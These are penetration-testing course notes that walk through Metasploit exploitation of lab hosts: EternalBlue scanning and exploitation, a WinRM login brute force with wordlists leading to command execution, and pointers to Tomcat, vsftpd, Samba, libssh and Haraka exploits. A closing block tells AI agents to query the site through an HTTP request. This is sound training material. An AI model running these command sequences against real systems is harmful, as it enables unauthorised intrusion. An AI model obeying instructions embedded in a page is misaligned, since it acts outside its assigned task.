# Exploitation

## Windows Exploitation <a href="#hfs-http-file-server" id="hfs-http-file-server"></a>

### HFS (HTTP File Server) <a href="#hfs-http-file-server" id="hfs-http-file-server"></a>

A **HFS** (HTTP File Server) is a file and documents sharing web server.

* Rejetto HFS - free open source HTTP file server

> 🔬 [HFS - MSF Exploit](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/3-metasploit/hfs-msf-exp)​

### SMB - MS17-010 EternalBlue <a href="#smb-ms17-010-eternalblue" id="smb-ms17-010-eternalblue"></a>

* ​[CVE-2017-0144](https://nvd.nist.gov/vuln/detail/CVE-2017-0144)​
* ​[EternalBlue VA](https://blog.syselement.com/ine/courses/ejpt/assessment-methodologies/4-va#eternalblue)​
  * **EternalBlue** takes advantage of a Windows SMBv1 protocol vulnerability
  * Patch was released in March 2017

> 🔬 Check the [Lab 2 - Eternal Blue here](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/1-system-attack/windows-attacks/smb-psexec)​

* Some MSF useful commands from my Home Lab (`Kali VM + Win 2008_R2 Server`)

service postgresql start && msfconsole -qdb\_statussetg RHOSTS 192.168.31.131setg RHOST 192.168.31.131workspace -a EternalBlue​db\_nmap -sS -sV -O 192.168.31.131search type:auxiliary EternalBlueuse auxiliary/scanner/smb/smb\_ms17\_010optionsrun​search type:exploit EternalBlueuse exploit/windows/smb/ms17\_010\_eternalblueoptionsrun

### WinRM <a href="#winrm" id="winrm"></a>

* Identify WinRM users with MSF and exploit WinRM by obtaining access credentials.
* Default WinRM HTTP port is **`5985`** and HTTPS **`5986`**

> 🔬 [WinRM Attack lab](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/1-system-attack/windows-attacks/winrm)​

service postgresql start && msfconsole -qdb\_statussetg RHOSTS 10.2.27.173setg RHOST 10.2.27.173workspace -a WinRM​db\_nmap -sS -sV -O -p- 10.2.27.173# Port 5985 is set up for WinRMsearch type:auxiliary winrmuse auxiliary/scanner/winrm/winrm\_auth\_methodsoptionsrun​# Brute force WinRM loginsearch winrm\_loginuse auxiliary/scanner/winrm/winrm\_loginset USER\_FILE /usr/share/metasploit-framework/data/wordlists/common\_users.txtset PASS\_FILE /usr/share/metasploit-framework/data/wordlists/unix\_passwords.txt​search winrm\_cmduse auxiliary/scanner/winrm/winrm\_cmdset USERNAME administratorset PASSWORD tinkerbellset CMD whoamirun![](https://2946054920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-0bc3dc4945d45488dc092b94ee70750d1eb5b2e2%2Fimage-20230416114857268.png?alt=media)search winrm\_scriptuse exploit/windows/winrm/winrm\_script\_execset USERNAME administratorset PASSWORD tinkerbellset FORCE\_VBS trueexploit

### Apache Tomcat <a href="#apache-tomcat" id="apache-tomcat"></a>

​[**`Apache Tomcat`**](https://tomcat.apache.org/) is a free open source Java servlet web server, *build to host dynamic websites and web apps developed in **Java***.

* Tomcat default TCP port is **`8080`**
* Apache web server host HTML/PHP web apps, instead
* Apache Tomcat < **`v.8.5.23`** is vulnerable to a JSP Upload Bypass / RCE

> 🔬 [Tomcat - MSF Exploit](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/3-metasploit/tomcat-msf-exp)​

## Linux Exploitation <a href="#ftp-1" id="ftp-1"></a>

### FTP <a href="#ftp-1" id="ftp-1"></a>

​[**`vsftpd`**](https://security.appspot.com/vsftpd.html) is an Unix FTP server.

* vsftpd **`v.2.3.4`** is vulnerable to a command execution vulnerability

> 🔬 [FTP - MSF Exploit](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/3-metasploit/ftpd-msf-exp)​

### SAMBA <a href="#samba" id="samba"></a>

**`Samba`** is the Linux implementation of SMB.

* Samaba **`v.3.5.0`** is vulnerable to a RCE vulnerability

> 🔬 [Samba - MSF Exploit](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/3-metasploit/samba-msf-exp)​

### SSH <a href="#ssh-1" id="ssh-1"></a>

**`libssh`** is a C library that implements the SSHv2 protocol

* **`SSH`** default TCP port is **`22`**
* libssh **`v.0.6.0 - 0.8.0`** is vulnerable to an authentication bypass vulnerability

> 🔬 [SSH - MSF Exploit](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/3-metasploit/ssh-msf-exp)​

### SMTP <a href="#smtp-1" id="smtp-1"></a>

​[**`Haraka`**](https://haraka.github.io/) is an open source high performance SMTP server developed in `Node.js`

* **`SMTP`** default TCP port is **`25`**
  * other TCP ports are **`465`** and **`587`**
* Haraka prior to **`v.2.8.9`** is vulnerable to command injection

> 🔬 [SMTP - MSF Exploit](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/3-metasploit/smtp-msf-exp)​


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://dev-angelist.gitbook.io/ine-elearning-ejptv2-notes/readme/host-and-network-penetration-testing/2.3-the-metasploit-framework-msf/exploitation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.